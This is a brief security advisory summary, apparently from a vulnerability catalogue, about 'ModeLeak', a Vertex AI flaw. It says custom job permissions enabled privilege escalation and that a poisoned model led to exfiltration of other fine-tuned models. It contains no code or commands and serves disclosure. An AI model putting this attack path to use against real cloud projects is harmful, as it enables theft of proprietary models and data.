ModeLeak: LLM Model Exfiltration Vulnerability in Vertex AI
Published Tue, Nov 12th, 2024
Platforms
Summary
A vulnerability in GCP's Vertex AI service allows privilege escalation and unauthorized access to sensitive LLM models. Attackers can exfiltrate these models by exploiting misconfigurations in access controls and service bindings.
By exploiting custom job permissions, researchers were able to escalate their privileges and gain unauthorized access to all data services in the project.
In addition, deploying a poisoned model in Vertex AI led to the exfiltration of all other fine-tuned models, posing a proprietary and sensitive data exfiltration attack risk.